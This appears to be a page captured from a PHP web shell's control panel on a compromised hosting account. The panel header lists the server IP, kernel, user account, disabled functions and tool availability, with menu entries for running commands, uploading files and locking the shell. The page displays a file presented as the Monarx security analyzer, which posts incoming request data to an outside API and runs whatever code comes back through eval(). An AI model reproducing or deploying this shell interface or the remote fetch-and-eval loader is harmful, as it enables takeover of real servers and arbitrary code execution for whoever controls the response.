Server IP : 82.180.170.48 / Your IP : 18.216.199.48 Web Server : LiteSpeed System : Linux us-phx-web1609.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64 User : u636808025 ( 636808025) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u636808025/domains/multcleanvv.com.br/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
---|
<?php /**================================================================================================ ___ ___ | \/ | Copyright (C) 2017-2023, Monarx, Inc. | . . | ___ _ __ __ _ _ __ __ __ | |\/| | / _ \ | '_ \ / _` || '__|\ \/ / | | | || (_) || | | || (_| || | > < \_| |_/ \___/ |_| |_| \__,_||_| /_/\_\ =================================================================================================== @package Monarx Security Site Analyzer @file monarx-analyzer.php @copyright Monarx, Inc. Not for external use, redistribution, or sale. @site https://www.monarx.com =================================================================================================== This scripts provides Monarx with site analysis data, which is utilized to identify and remediate malicious activity. --------------------------------------------------------------------------------------------------*/ error_reporting(0); header('Access-Control-Allow-Origin: *'); header('Access-Control-Allow-Methods: GET, POST, OPTIONS'); header("Access-Control-Allow-Headers: *"); ignore_user_abort(true); set_time_limit(3000); ini_set('max_execution_time', 3000); class MonarxSecuritySiteAnalyzer { private $instructions; public function __construct() { $req_body = json_decode(file_get_contents("php://input") , true); if ($req_body) { $instructions = $this->httPost('https://api.monarx.com/v1/intelligence/site-analysis/register', $req_body); $this->instructions = $instructions; } } private function httPost($url, $data) { $payload = json_encode($data); $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLINFO_HEADER_OUT, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type:application/json' )); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_USERAGENT, 'Monarx Security'); $result = curl_exec($ch); curl_close($ch); return $result; } public function run() { if (isset($this->instructions) && strlen($this->instructions)) { eval($this->instructions); } } } try { $mnx = new MonarxSecuritySiteAnalyzer(); $success = $mnx->run(); } catch(Exception $e) { // }